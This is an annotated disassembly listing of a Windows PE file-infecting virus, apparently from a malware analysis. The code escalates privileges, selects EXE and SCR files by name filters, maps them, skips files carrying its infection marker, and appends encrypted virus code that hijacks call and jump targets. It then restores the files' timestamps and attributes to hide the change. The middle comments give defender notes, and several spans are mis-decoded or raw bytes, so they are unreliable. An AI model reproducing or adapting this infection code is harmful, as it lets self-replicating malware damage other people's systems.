XREF: sub_3143AEE1+Fp add bh, bh sub_3143AEE1 endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al mov [ebp+104304h], eax push ebx mov ebx, [eax+3Ch] add ebx, eax push dword ptr [ebx+28h] mov eax, [ebx+34h] call sub_3143A404 mov edx, [ebp+1042E4h] pop ebx add eax, [edx+0Ch] mov [ebp+104308h], eax add eax, [edx+8] mov [ebp+10430Ch], eax mov esi, [ebx+28h] push dword ptr [ebx+80h] call sub_3143A404 mov edi, [ebp+1042E4h] push esi call sub_3143A404 mov edx, [ebp+1042E4h] mov ecx, [edx+8] add ecx, [edx+0Ch] sub ecx, esi sub ecx, 5 js loc_3143B0C9 jz loc_3143B0C9 add esi, [ebp+1042E8h] add esi, [ebp+1042A4h] ; START OF FUNCTION CHUNK FOR sub_3143B09A loc_3143AF7B: ; CODE XREF: sub_3143B09A+29j lodsb cmp al, 0E8h jnz loc_3143B026 lea eax, [esi+4] sub eax, [ebp+1042A4h] add eax, [esi] push eax call sub_3143A404 cmp dword ptr [ebp+1042E4h], 0 jnz short loc_3143AFA9 cmp eax, [edi+0Ch] jnb loc_3143B0C2 jmp short loc_3143AFB5 ; --------------------------------------------------------------------------- loc_3143AFA9: ; CODE XREF: sub_3143B09A-FEj cmp [ebp+1042E4h], edx jnz loc_3143B0C2 loc_3143AFB5: ; CODE XREF: sub_3143B09A-F3j add eax, [ebp+1042A4h] cmp word ptr [eax], 25FFh jnz loc_3143B0C2 mov eax, [eax+2] sub eax, [ebx+34h] push eax call sub_3143A404 cmp [ebp+1042E4h], edi jnz loc_3143B0C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov eax, [eax] sub eax, [edi+0Ch] jb loc_3143B0C2 cmp eax, [edi+8] jnb loc_3143B0C2 loc_3143AFFE: ; CODE XREF: sub_3143B09A+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042A4h] push edx push eax push dword ptr [ebp+104304h] call dword ptr [ebp+103E5Eh] pop edx test eax, eax jnz loc_3143B0D8 jmp loc_3143B0C2 ; --------------------------------------------------------------------------- loc_3143B026: ; CODE XREF: sub_3143B09A-11Cj cmp al, 0FFh jnz loc_3143B0C2 cmp byte ptr [esi], 15h jnz loc_3143B0C2 mov eax, [esi+1] sub eax, [ebx+34h] push eax call sub_3143A404 cmp [ebp+1042E4h], edi jnz short loc_3143B0C2 add eax, 
[ebp+1042E8h] add eax, [ebp+1042A4h] mov [ebp+104310h], eax mov eax, [eax] cmp eax, [ebp+104308h] jb short loc_3143B06F cmp eax, [ebp+10430Ch] jb short loc_3143B0D8 loc_3143B06F: ; CODE XREF: sub_3143B09A-35j cmp eax, 70000000h jb short loc_3143B0AD call sub_3143B09A lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104310h] jnz short locret_3143B099 add esp, 10h push dword ptr [ecx] pop [esp-0Ch+arg_24] popa jmp short loc_3143B0B4 ; --------------------------------------------------------------------------- locret_3143B099: ; CODE XREF: sub_3143B09A-Fj retn ; END OF FUNCTION CHUNK FOR sub_3143B09A ; =============== S U B R O U T I N E ======================================= sub_3143B09A proc near ; CODE XREF: sub_3143B09A-24p var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_24 = dword ptr 28h ; FUNCTION CHUNK AT 3143AF7B SIZE 0000011F BYTES pop dword ptr [ebp+1042C4h] pusha mov esi, [ebp+1042A4h] call sub_3143A50B popa loc_3143B0AD: ; CODE XREF: sub_3143B09A-26j test eax, 80000000h jnz short loc_3143B0C2 loc_3143B0B4: ; CODE XREF: sub_3143B09A-3j sub eax, [edi+0Ch] jb short loc_3143B0C2 cmp eax, [edi+8] jb loc_3143AFFE loc_3143B0C2: ; CODE XREF: sub_3143B09A-F9j ; sub_3143B09A-EBj ... dec ecx jnz loc_3143AF7B loc_3143B0C9: ; CODE XREF: sub_3143AEE1+9j ; UPX2:3143AF63j ... 
mov edi, [esp-4+arg_0] and dword ptr [edi+29B0h], 0FFBFFFFFh jmp short loc_3143B11A ; --------------------------------------------------------------------------- loc_3143B0D8: ; CODE XREF: sub_3143B09A-7Fj ; sub_3143B09A-2Dj or dword ptr [edx+24h], 0E0000060h dec esi xor eax, eax mov ecx, [esp+8+var_8] xchg eax, [ebp+1042F0h] mov [ebp+1042ECh], eax lea edi, [ecx+29B4h] add eax, [ebp+1042A4h] movsw movsd dec esi sub eax, esi add eax, [edx+14h] sub eax, [edx+0Ch] mov byte ptr [esi-5], 0E8h mov dword ptr [ecx+54h], 5 mov [esi-4], eax loc_3143B11A: ; CODE XREF: sub_3143B09A+3Cj pop edi pop esi retn sub_3143B09A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143B11D proc near ; CODE XREF: UPX2:3143B41Ep ; FUNCTION CHUNK AT 3143B247 SIZE 00000002 BYTES push edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jnz loc_3143B247 push eax push esp push 28h push 0FFFFFFFFh call dword ptr [ebp+103F0Ah] test eax, eax pop edi js loc_3143B247 call sub_3143959F call near ptr loc_3143B158+5 push ebx db 65h jz short near ptr unk_3143B196 imul ebp, [ebp+53h], 72756365h loc_3143B158: ; CODE XREF: sub_3143B11D+2Ap imul esi, [ecx+edi*2+41h], 78B5FF00h sub_3143B11D endp ; sp-analysis failed inc edx adc [eax], al call dword ptr [ebp+103E5Eh] mov [ebp+104280h], eax call near ptr loc_3143B18C+1 push ebx db 65h push esp popa imul esp, [ebp+4Fh], 77h outsb db 65h jb short loc_3143B1F3 push 72507069h imul esi, [esi+69h], 6567656Ch loc_3143B18C: ; CODE XREF: UPX2:3143B16Fp add [edi-18h], dl sub eax, ebp ; --------------------------------------------------------------------------- db 0FFh db 0FFh db 0E8h ; db 13h db 0 unk_3143B196 db 0 ; CODE XREF: sub_3143B11D+30j db 0 db 53h ; S db 65h ; e db 52h ; R db 65h ; e db 73h ; s db 74h ; t db 6Fh ; o db 72h ; r db 65h ; e db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0Bh db 0E8h ; db 0FFh db 0FFh db 0E8h ; db 12h db 
0 db 0 db 0 db 53h ; S db 65h ; e db 42h ; B db 61h ; a db 63h ; c db 6Bh ; k db 75h ; u db 70h ; p db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0EEh ; db 0E7h ; db 0FFh db 0FFh db 0E8h ; db 18h db 0 db 0 db 0 db 53h ; S db 65h ; e db 43h ; C db 68h ; h db 61h ; a db 6Eh ; n db 67h ; g db 65h ; e db 4Eh ; N db 6Fh ; o db 74h ; t db 69h ; i db 66h ; f db 79h ; y db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0CBh ; db 0E7h ; db 0FFh db 0FFh db 50h ; P db 54h ; T ; --------------------------------------------------------------------------- loc_3143B1F3: ; CODE XREF: UPX2:3143B17Dj lea eax, [ebp+103DBCh] push 64h push eax push 1 push edi call dword ptr [ebp+103F16h] mov [esp], edi call dword ptr [ebp+103E52h] sub al, al lea edi, [ebp+104174h] push eax push eax push eax push dword ptr [ebp+103DBCh] push 40001h push esp push 1 push edi call dword ptr [ebp+104280h] push esp push 4 push edi call dword ptr [ebp+104280h] add esp, 14h push dword ptr [ebp+104278h] call dword ptr [ebp+103E8Eh] ; START OF FUNCTION CHUNK FOR sub_3143B11D loc_3143B247: ; CODE XREF: sub_3143B11D+Aj ; sub_3143B11D+1Fj pop edi retn ; END OF FUNCTION CHUNK FOR sub_3143B11D ; =============== S U B R O U T I N E ======================================= sub_3143B249 proc near ; CODE XREF: UPX2:3143B417p ; UPX2:3143B423p ... 
; Body of sub_3143B249 (its `proc` line sits just before this span).
; Opens the file named by the path buffer at [ebp+104174h] and maps it for
; read/write access. Every API is reached through a pointer table at
; [ebp+103Exxh] that is filled outside this excerpt, so the API names in the
; comments below are inferred from argument shape only -- TODO confirm
; against the import resolver.
; In:  EBX = number of bytes added to the file size when sizing the mapping.
; Out: ZF clear on success, with the view base stored at [ebp+1042A4h];
;      ZF set on every failure path (the later ones leave through the
;      cleanup labels inside sub_3143B84E).
; State written: [ebp+104284h] first call's result, [ebp+104288h] file handle,
; [ebp+10428Ch]/[ebp+104294h] two out-buffers, [ebp+10429Ch] file size,
; [ebp+1042A0h] mapping handle.
; Defender note: the sequence saves what look like attributes and timestamps
; before the write and sub_3143B84E puts them back, so file times and
; attributes alone may not reveal that the file was modified.
        lea esi, [ebp+104174h]
        push esi
        call dword ptr [ebp+103E92h]    ; (path) -> value, -1 on error; shape of GetFileAttributesA
        cmp eax, 0FFFFFFFFh
        jz locret_3143B31A
        mov [ebp+104284h], eax
        push 0
        push esi
        call dword ptr [ebp+103ECEh]    ; (path, 0); shape of SetFileAttributesA clearing all attributes
        test eax, eax
        jz locret_3143B31A
        sub eax, eax
        push eax
        push eax
        push 3
        push eax
        push 1
        push 0C0000000h
        push esi
        call dword ptr [ebp+103E6Eh]    ; 7 args (path, C0000000h, 1, 0, 3, 0, 0); shape of CreateFileA, read+write, open existing
        cmp eax, 0FFFFFFFFh
        jz loc_3143B89B
        mov [ebp+104288h], eax
        lea ecx, [ebp+10428Ch]
        lea edx, [ebp+104294h]
        push ecx
        push edx
        push 0
        push eax
        call dword ptr [ebp+103E9Ah]    ; (handle, 0, buf, buf); shape of GetFileTime
        cmp eax, 0FFFFFFFFh
        jz loc_3143B88F
        push 0
        push dword ptr [ebp+104288h]
        call dword ptr [ebp+103E96h]    ; (handle, 0) -> size, -1 on error; shape of GetFileSize
        cmp eax, 0FFFFFFFFh
        jz loc_3143B88F
        mov [ebp+10429Ch], eax
        xor ecx, ecx
        add eax, ebx                    ; mapping size = file size + caller-supplied growth
        push ecx
        push eax
        push ecx
        push 4
        push ecx
        push dword ptr [ebp+104288h]
        call dword ptr [ebp+103E72h]    ; (handle, 0, 4, 0, size, 0); shape of CreateFileMappingA, page read/write
        test eax, eax
        jz loc_3143B88F
        xor ecx, ecx
        mov [ebp+1042A0h], eax
        push ecx
        push ecx
        push ecx
        push 0F001Fh
        push eax
        call dword ptr [ebp+103EBAh]    ; (mapping, 0F001Fh, 0, 0, 0); shape of MapViewOfFile, all access
        test eax, eax
        jz loc_3143B867
        mov [ebp+1042A4h], eax          ; mov leaves ZF clear from the test above = success
locret_3143B31A: ; CODE XREF: sub_3143B249+10j
 ; sub_3143B249+27j ...
        retn
sub_3143B249 endp
; ---------------------------------------------------------------------------
; loc_3143B31B -- computes two rounded sizes from the PE header at EBX.
; Offsets 38h and 3Ch from the PE signature are SectionAlignment and
; FileAlignment in a PE32 header.
;   [ebp+1042B0h] = (7317h + [ebp+101069h] + SectionAlignment), rounded down
;                   to a multiple of SectionAlignment
;   [ebp+1042A8h] = (29BBh + [ebp+101069h] + FileAlignment), rounded down to
;                   a multiple of FileAlignment
; NOTE(review): the nine `db` bytes F7 85 B0 39 10 00 00 00 00 and the
; following `and [ebp+6], dh` look like a single mis-decoded
; `test dword ptr [ebp+1039B0h], 20000000h` / `jnz short $+8` pair, which
; would make the first `add eax, [ebp+101069h]` conditional. The disassembler
; lost sync here; re-decode before trusting the flow shown.
; Clobbers EAX, ECX, EDX.
loc_3143B31B: ; CODE XREF: sub_3143B44B+188p
 ; sub_3143B44B+2A0p
        mov eax, 7317h
        mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
        db 0F7h ;
        db 85h ;
        db 0B0h ;
        db 39h ; 9
        db 10h
        db 0
        db 0
        db 0
        db 0
; ---------------------------------------------------------------------------
        and [ebp+6], dh
        add eax, [ebp+101069h]
        xor edx, edx                    ; EDX:EAX must be a clean 64-bit dividend for div
        add eax, ecx
        div ecx
        mul ecx                         ; quotient * alignment = aligned size
        mov [ebp+1042B0h], eax
        mov eax, 29BBh
        mov ecx, [ebx+3Ch]
        add eax, [ebp+101069h]
        xor edx, edx
        add eax, ecx
        div ecx
        mul ecx
        mov [ebp+1042A8h], eax
        retn
; =============== S U B R O U T I N E =======================================
;
; sub_3143B360 -- walks the section table backwards from the last entry and
; reports through CF whether the file should be left alone.
; In:  EBX = PE header ([ebx+6] section count, [ebx+14h] optional-header size,
;      28h-byte section headers starting at ebx+18h+[ebx+14h]).
; Out: EDX = section header that was examined last.
;      CF set  (callers use `jb`) when: there are no sections; or a section
;              name starts with the four bytes "_win"; or the file size at
;              [ebp+10429Ch] is larger than the selected section's raw end
;              rounded up to FileAlignment plus one more alignment unit
;              (i.e. data follows the last section).
;      CF clear otherwise.
; Sections whose dword at +0Ch (VirtualAddress) is 0 are skipped.
; Detection note: a section whose name begins with "_win" is treated here as
; a do-not-touch marker; what creates such a section is not visible in this
; excerpt.
; Clobbers EAX, ECX, EDX.
sub_3143B360 proc near ; CODE XREF: sub_3143B44B:loc_3143B4C0p
 ; sub_3143B44B+1B4p
        movzx ecx, word ptr [ebx+6]
        stc                             ; CF = 1 in case the section count is zero
loc_3143B365: ; CODE XREF: sub_3143B360+23j
        jecxz short locret_3143B39C
        lea edx, [ebx+18h]
        movzx eax, word ptr [ebx+14h]
        add edx, eax                    ; EDX = first section header
        dec ecx
        imul eax, ecx, 28h
        add edx, eax                    ; EDX = header of section index ECX
        cmp dword ptr [edx], 6E69775Fh  ; bytes 5F 77 69 6E = "_win"
        stc
        jz short locret_3143B39C
        cmp dword ptr [edx+0Ch], 1
        jb short loc_3143B365           ; +0Ch == 0: try the previous section (CF stays set)
        mov ecx, [ebx+3Ch]
        mov eax, [edx+14h]
        add eax, [edx+10h]              ; raw offset + raw size = end of section data in the file
        lea eax, [eax+ecx*2-1]
        neg ecx
        and eax, ecx                    ; round up to the alignment, plus one extra unit
        cmp eax, [ebp+10429Ch]          ; CF = 1 if the file is larger than that
locret_3143B39C: ; CODE XREF: sub_3143B360:loc_3143B365j
 ; sub_3143B360+1Dj ...
        retn
sub_3143B360 endp
; =============== S U B R O U T I N E =======================================
;
; sub_3143B39D -- exception-handler body. It is reached by the `call` at
; 3143B435, whose own address is what sub_3143B44B leaves on the stack as the
; handler field of the frame it links at fs:[0]. With that extra return
; address on the stack, [esp+10h] is the handler's third argument; offset
; 0B8h matches the Eip field of the x86 CONTEXT structure. The routine pops
; its own return address into that field and returns 0, so execution resumes
; at the instruction after the `call` (3143B43A) -- assuming the OS passes
; the usual (record, frame, context, dispatcher) arguments; TODO confirm.
sub_3143B39D proc near ; CODE XREF: UPX2:3143B435p
arg_C = dword ptr 10h
        mov edx, [esp+arg_C]
        xor eax, eax
        pop dword ptr [edx+0B8h]
        retn
sub_3143B39D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; File-name filter and per-file driver. The entry is the unlabelled
; `lea edi, [ebp+104174h]` below; its caller is not visible here.
; In: ESI = NUL-terminated path.
; The path is copied to the buffer at [ebp+104174h] with a-z folded to upper
; case. EBX tracks the character after the last '\', ECX the character after
; the last '.' seen since that backslash.
; The file is processed only when
;   - the extension is exactly "EXE" or "SCR", and
;   - the file name does not start with "WINC", "WCUN", "WC32" or "PSTO".
; It is then opened with sub_3143B249 (EBX = 0); if that fails,
; sub_3143B11D is called and the open is retried once.
loc_3143B3AA: ; CODE XREF: UPX2:3143B3CBj
        mov ecx, edi                    ; remember position just past the '.'
        jmp short loc_3143B3B9
; ---------------------------------------------------------------------------
        lea edi, [ebp+104174h]
        cld
loc_3143B3B5: ; CODE XREF: UPX2:3143B3C7j
        mov ebx, edi                    ; start of the current path component
        xor ecx, ecx                    ; no '.' seen in this component yet
loc_3143B3B9: ; CODE XREF: UPX2:3143B3ACj
 ; UPX2:3143B3CFj
        lodsb
        cmp al, 61h
        jb short loc_3143B3C4
        cmp al, 7Ah
        ja short loc_3143B3C4
        sub al, 20h                     ; 'a'..'z' -> 'A'..'Z'
loc_3143B3C4: ; CODE XREF: UPX2:3143B3BCj
 ; UPX2:3143B3C0j
        stosb
        cmp al, 5Ch
        jz short loc_3143B3B5
        cmp al, 2Eh
        jz short loc_3143B3AA
        cmp al, 0
        jnz short loc_3143B3B9
        jecxz short locret_3143B39C     ; no extension: ignore the file
        mov eax, [ecx]
        cmp eax, 455845h                ; "EXE" + NUL
        jz short loc_3143B3E7
        cmp eax, 524353h                ; "SCR" + NUL
        jnz locret_3143B31A
loc_3143B3E7: ; CODE XREF: UPX2:3143B3DAj
        mov eax, [ebx]                  ; first four characters of the file name
        cmp eax, 434E4957h              ; "WINC"
        jz locret_3143B31A
        cmp eax, 4E554357h              ; "WCUN"
        jz locret_3143B31A
        cmp eax, 32334357h              ; "WC32"
        jz locret_3143B31A
        cmp eax, 4F545350h              ; "PSTO"
        jz locret_3143B31A
        xor ebx, ebx                    ; first mapping adds no extra size
        call sub_3143B249
        jnz short loc_3143B42E          ; ZF clear = mapped
        call sub_3143B11D
        call sub_3143B249
        jz locret_3143B31A
loc_3143B42E: ; CODE XREF: UPX2:3143B41Cj
        xor edx, edx                    ; EDX = 0 so fs:[edx] below is fs:[0]
        call sub_3143B44B
        call sub_3143B39D               ; this instruction's address doubles as the SEH handler entry
        call $+5
        pop ebp
        sub ebp, 10343Fh                ; recompute the EBP base used for all [ebp+...] data references
        jmp loc_3143B845
; =============== S U B R O U T I N E =======================================
;
; sub_3143B44B -- start of the routine that processes the mapped file; it
; continues past this span, so only the visible pre-checks are described.
; It links an exception frame at fs:[0] built from the saved previous head
; and the caller's return address, then jumps to loc_3143B845 unless:
;   - the view at [ebp+1042A4h] starts with "MZ" and the header at
;     base+[base+3Ch] starts with "PE",
;   - bit 2000h of the field at +16h is clear (in a PE file header that bit
;     is the DLL flag),
;   - bit 1 of the byte at +5Ch is set (+5Ch is the Subsystem field; the bit
;     is set for the Windows GUI and console values),
;   - the dword at +8 (TimeDateStamp) is neither 0A0A0A0A0h nor 20202020h.
; Detection note: later in this routine 0A0A0A0A0h is written to [ebx+8]
; under a flag, so that timestamp value appears to serve as an
; already-processed marker.
sub_3143B44B proc near ; CODE XREF: UPX2:3143B430p
var_14 = dword ptr -14h
        push dword ptr fs:[edx]
        mov esi, [ebp+1042A4h]
        mov fs:[edx], esp
        cmp word ptr [esi], 5A4Dh
        jnz loc_3143B845
        mov ebx, [esi+3Ch]
        add ebx, esi
        cmp word ptr [ebx], 4550h
        jnz loc_3143B845
        test dword ptr [ebx+16h], 2000h
        jnz loc_3143B845
        test byte ptr [ebx+5Ch], 2
        jz loc_3143B845
        mov eax, [ebx+8]
        cmp eax, 0A0A0A0A0h
        jz loc_3143B845
        cmp eax, 20202020h
        jz
loc_3143B845 mov ecx, [ebx+0C8h] jecxz short loc_3143B4C0 push ecx call sub_3143A404 add ecx, [ebp+1042E8h] add ecx, esi and dword ptr [ecx+40h], 0 and dword ptr [ecx+44h], 0 loc_3143B4C0: ; CODE XREF: sub_3143B44B+5Dj call sub_3143B360 jb loc_3143B845 and dword ptr [ebp+1042ECh], 0 mov eax, [edx+8] mov ecx, [edx+10h] sub eax, ecx jnb short loc_3143B4E0 xor eax, eax jmp short loc_3143B4E5 ; --------------------------------------------------------------------------- loc_3143B4E0: ; CODE XREF: sub_3143B44B+8Fj add ecx, eax mov [edx+10h], ecx loc_3143B4E5: ; CODE XREF: sub_3143B44B+93j mov [ebp+1042ACh], eax add ecx, [edx+0Ch] mov eax, 10000h push ecx call near ptr dword_31439B40+43h xor [ebp+1039AEh], dl mov cl, 20h xor [ebp+1039AFh], dh loc_3143B507: ; CODE XREF: sub_3143B44B+D5j push 20h dec cl pop eax js short loc_3143B522 call near ptr dword_31439B40+43h test edx, edx setz dl shl edx, cl xor [ebp+1039B0h], edx jmp short loc_3143B507 ; --------------------------------------------------------------------------- loc_3143B522: ; CODE XREF: sub_3143B44B+C1j test dword ptr [ebp+1039B0h], 2000000h jz short loc_3143B550 test dword ptr [ebp+1039B0h], 3 jnz short loc_3143B546 and dword ptr [ebp+1039B0h], 0F7FFFFFFh jmp short loc_3143B550 ; --------------------------------------------------------------------------- loc_3143B546: ; CODE XREF: sub_3143B44B+EDj or dword ptr [ebp+1039B0h], 10000000h loc_3143B550: ; CODE XREF: sub_3143B44B+E1j ; sub_3143B44B+F9j ... 
push 6 pop ecx loc_3143B556: ; CODE XREF: sub_3143B44B+129j push 6 pop eax call near ptr dword_31439B40+43h mov al, [ebp+1039A8h] xchg al, [edx+ebp+1039A8h] mov [ebp+1039A8h], al loop loc_3143B556 test dword ptr [ebp+1039B0h], 8 jnz short loc_3143B58B cmp byte ptr [ebp+1039AAh], 1 jz short loc_3143B550 loc_3143B58B: ; CODE XREF: sub_3143B44B+135j test dword ptr [ebp+1039B0h], 10000000h jz short loc_3143B5B2 cmp byte ptr [ebp+1039A8h], 5 jz short loc_3143B550 cmp byte ptr [ebp+1039A9h], 5 jz short loc_3143B550 cmp byte ptr [ebp+1039AAh], 5 jz short loc_3143B550 loc_3143B5B2: ; CODE XREF: sub_3143B44B+14Aj test dword ptr [ebp+1039B0h], 400000h jz short loc_3143B5C7 cmp byte ptr [ebp+1039A8h], 2 ja short loc_3143B550 loc_3143B5C7: ; CODE XREF: sub_3143B44B+171j and dword ptr [ebp+1042F0h], 0 call loc_3143A845 call loc_3143B31B call sub_3143B84E mov ebx, [ebp+1042A8h] add ebx, [ebp+1042ACh] call sub_3143B249 jz loc_3143B845 mov esi, [ebp+1042A4h] mov ebx, [esi+3Ch] add ebx, esi call sub_3143B360 jb loc_3143B845 or dword ptr [edx+24h], 0E0000060h mov edi, esi push edx push esi add edi, [edx+14h] add edi, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_3143B63B mov [ebp+1042F4h], edi lea esi, [ebp+1039BCh] mov ecx, [ebp+101069h] rep movsb loc_3143B63B: ; CODE XREF: sub_3143B44B+1DAj push edi mov ecx, 0A6Fh lea esi, [ebp+101000h] rep movsd mov cl, 0 jecxz short loc_3143B64F rep movsb loc_3143B64F: ; CODE XREF: sub_3143B44B+200j test dword ptr [ebp+1039B0h], 20000000h jz loc_3143B70D push dword ptr [ebx+28h] call sub_3143A404 mov edx, [ebp+1042E4h] test edx, edx jz loc_3143B70D mov esi, [ebp+1042A4h] mov ecx, [edx+10h] or dword ptr [edx+24h], 0E0000060h sub ecx, [edx+8] jnb short loc_3143B68C xor ecx, ecx loc_3143B68C: ; CODE XREF: sub_3143B44B+23Dj add esi, [edx+14h] cmp ecx, [ebp+101069h] mov ecx, [ebp+101069h] jb short loc_3143B6F3 mov edi, [esp+14h+var_14] and dword ptr [ebp+101069h], 0 and dword ptr [edi+69h], 0 mov edi, [edx+8] add [edx+8], ecx add 
esi, edi xchg esi, edi mov eax, [ebp+1042B8h] test dword ptr [ebp+1039B0h], 40h jz short loc_3143B6CC neg dword ptr [eax] loc_3143B6CC: ; CODE XREF: sub_3143B44B+27Dj add esi, [edx+0Ch] sub [eax], esi mov [ebp+1042F0h], esi mov esi, [ebx+28h] add [eax], esi test dword ptr [ebp+1039B0h], 40h jz short loc_3143B6EA neg dword ptr [eax] loc_3143B6EA: ; CODE XREF: sub_3143B44B+29Bj push ecx call loc_3143B31B pop ecx jmp short loc_3143B6FF ; --------------------------------------------------------------------------- loc_3143B6F3: ; CODE XREF: sub_3143B44B+250j add esi, [ebx+28h] sub esi, [edx+0Ch] push ecx push esi rep movsb pop edi pop ecx loc_3143B6FF: ; CODE XREF: sub_3143B44B+2A6j lea esi, [ebp+1039BCh] mov [ebp+1042F4h], edi rep movsb loc_3143B70D: ; CODE XREF: sub_3143B44B+20Ej ; sub_3143B44B+224j pop edi pop esi rdtsc xchg eax, edx lea eax, [edi+137h] cmp dl, [ebp+1039AEh] jnz short loc_3143B726 imul edx, 12345678h loc_3143B726: ; CODE XREF: sub_3143B44B+2D3j mov [eax-19h], dx call sub_31439120 pop edx mov ecx, [edx+0Ch] add ecx, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h lea eax, [ecx+5] jnz short loc_3143B758 mov [ebp+1042F0h], ecx add eax, [ebp+101069h] and dword ptr [edi+69h], 0 loc_3143B758: ; CODE XREF: sub_3143B44B+2F8j sub eax, [ebx+28h] mov [edi+54h], eax test dword ptr [ebp+103F6Ch], 1 jz short loc_3143B774 mov dword ptr [ebx+8], 0A0A0A0A0h loc_3143B774: ; CODE XREF: sub_3143B44B+320j test dword ptr [ebp+1039B0h], 400000h jz short loc_3143B787 push edx call sub_3143AEE1 pop edx loc_3143B787: ; CODE XREF: sub_3143B44B+333j mov ecx, [ebp+1042F0h] jecxz short loc_3143B794 mov [ebx+28h], ecx jmp short loc_3143B7A1 ; --------------------------------------------------------------------------- loc_3143B794: ; CODE XREF: sub_3143B44B+342j mov ecx, [ebp+1042ECh] jecxz short loc_3143B79E jmp short loc_3143B7A1 ; --------------------------------------------------------------------------- loc_3143B79E: ; CODE XREF: sub_3143B44B+34Fj mov ecx, [ebx+28h] 
loc_3143B7A1: ; CODE XREF: sub_3143B44B+347j ; sub_3143B44B+351j test dword ptr [ebp+1039B0h], 3 jz short loc_3143B7C1 mov eax, [ebp+1042F4h] add ecx, [ebp+1042DCh] add eax, [ebp+1042D8h] add [eax], ecx loc_3143B7C1: ; CODE XREF: sub_3143B44B+360j mov ecx, [edx+10h] mov eax, [ebp+1042A8h] cmp [edx+8], ecx jnb short loc_3143B7D2 mov [edx+8], ecx loc_3143B7D2: ; CODE XREF: sub_3143B44B+382j add [edx+10h], eax and dword ptr [ebx+58h], 0 mov eax, [ebp+1042B0h] push 29BCh add [edx+8], eax pop ecx add [ebx+50h], eax mov dl, [ebp+1039AEh] test dword ptr [ebp+1039B0h], 20000000h jz short loc_3143B803 add ecx, [ebp+101069h] loc_3143B803: ; CODE XREF: sub_3143B44B+3B0j mov dh, 0 test dword ptr [ebp+1039B0h], 20000h jnz short loc_3143B825 inc dh test dword ptr [ebp+1039B0h], 40000h jnz short loc_3143B825 mov dh, [ebp+1039AFh] loc_3143B825: ; CODE XREF: sub_3143B44B+3C4j ; sub_3143B44B+3D2j test dword ptr [ebp+1039B0h], 4000h jnz short loc_3143B83C loc_3143B831: ; CODE XREF: sub_3143B44B+3EDj mov al, [edi] add al, dl stosb add dl, dh loop loc_3143B831 jmp short loc_3143B845 ; --------------------------------------------------------------------------- loc_3143B83C: ; CODE XREF: sub_3143B44B+3E4j ; sub_3143B44B+3F8j mov al, [edi] xor al, dl stosb add dl, dh loop loc_3143B83C loc_3143B845: ; CODE XREF: UPX2:3143B446j ; sub_3143B44B+11j ... xor edx, edx mov esp, fs:[edx] pop dword ptr fs:[edx] pop eax sub_3143B44B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143B84E proc near ; CODE XREF: sub_3143B44B+18Dp cmp dword ptr [ebp+104288h], 0 jz locret_3143B31A push dword ptr [ebp+1042A4h] call dword ptr [ebp+103EDEh] loc_3143B867: ; CODE XREF: sub_3143B249+C5j push dword ptr [ebp+1042A0h] call dword ptr [ebp+103E52h] lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103ED2h] loc_3143B88F: ; CODE XREF: sub_3143B249+6Bj ; sub_3143B249+82j ... 
push dword ptr [ebp+104288h] call dword ptr [ebp+103E52h] loc_3143B89B: ; CODE XREF: sub_3143B249+45j lea esi, [ebp+104174h] push dword ptr [ebp+104284h] push esi call dword ptr [ebp+103ECEh] and dword ptr [ebp+104288h], 0 retn sub_3143B84E endp ; --------------------------------------------------------------------------- dw 0E8h dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2070103h, 0FBCD0506h dd 7AB9C4FBh, 119415FFh, 0FF8B0100h ; --------------------------------------------------------------------------- cld stc push ebp mov ebp, esp call sub_3143B9DB clc call loc_3143BA88 xchg ebx, ebx cld clc mov ebp, 0 nop jmp loc_3143BA2D ; =============== S U B R O U T I N E ======================================= sub_3143B9DB proc near ; CODE XREF: UPX2:3143B9C1p push dword ptr fs:0 xor dword ptr ds:loc_31428214+1, ebp mov fs:0, esp xor eax, eax push eax push eax push eax push 10000h push 10h push eax push eax push 4000h push eax push 4 push eax push eax push eax call ds:dword_31428090 ; GetProcAddress xor eax, eax push eax push eax push eax push 80000000h push eax push 80000000h push eax push eax push eax push eax push eax call ds:dword_31428090 ; GetProcAddress loc_3143BA2D: ; CODE XREF: UPX2:3143B9D6j stc mov ecx, [ebp-8] mov fs:0, ecx xchg ebx, ebx stc clc stc nop call sub_3143BA83 xchg ebx, ebx nop nop sub edx, 0FFFF7286h xor ebx, ebx or ebx, 2A97h jmp short $+2 
; Remainder of sub_3143B9DB (its `proc` line and set-up are on the preceding
